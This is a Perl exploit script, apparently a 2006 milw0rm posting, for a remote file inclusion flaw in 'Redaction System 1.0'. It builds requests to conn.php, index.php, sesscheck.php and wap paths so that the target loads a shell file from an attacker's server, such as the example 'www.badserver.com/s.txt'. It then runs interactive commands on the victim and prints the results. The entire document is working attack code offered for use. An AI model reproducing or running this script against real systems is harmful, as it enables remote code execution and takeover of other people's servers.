#!/usr/bin/perl use LWP::UserAgent; $target = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; $fileno = @ARGV[3]; if(!$target || !$shellsite) { usage(); } header(); if ($fileno eq 1) { $file = " conn.php?lang_prefix="; } elsif ($fileno eq 2) { $file = "index.php?lang="; } elsif ($fileno eq 3) { $file = "sesscheck.php?lang_prefix="; } elsif ($fileno eq 4) { $file = "wap/conn.php?lang_prefix="; } elsif ($fileno eq 5) { $file = "wap/sesscheck.php?lang_prefix="; } else { $file = "conn.php?lang_prefix="; } while() { print "[cmd]\$"; while () { $cmd = $_; chomp($cmd); print $target.'/'.$file.'='.$shellsite.'?&'.$shellcmd.'='.$cmd; $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.'/'.$file.'='.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect."); $res = $xpl->request($req); $rp = $res->content; $rp =~ tr/[\n]/[ê]/; print $rp; if (!cmd) { print "\nEnter command: \n"; $rp = ""; } elsif ($rp=~/failed to open stream: HTTP request failed!/ || $rp=~/: Cannot execute a blank command in /) { print "\nUnable to connect to Shellsite, or invalid command variable\n"; exit; } elsif ($rp=~/^.Warning/) { print "\nInvalid Command\n\n"; exit; } if ($rp=~ /(.+).Warning.(.+).Warning/) { $final = $1; $final=~ tr/[ê]/[\n]/; print "\n$final\n"; } else { print "[cmd]\$ "; } } } sub header() { print q { ###################################################################### Redaction System 1.0000 - Remote Include Exploit Vulnerability discovered and exploit by r0ut3r writ3r@gmail.com Special thanks to Warpboy's perl tutorial http://milw0rm.com/papers/85 ###################################################################### }; } sub usage() { header(); print q { ###################################################################### Usage: perl rs_xpl.pl - Path to target eg: www.rsvuln.target.com - Path to shell eg: www.badserver.com/s.txt - Shell command variable name eg: cmd - File number, corresponding to: 1: conn.php 2: index.php 3: sesscheck.php 4: wap/conn.php 5: wap/sesscheck.php ###################################################################### }; exit(); } # milw0rm.com [2006-10-12]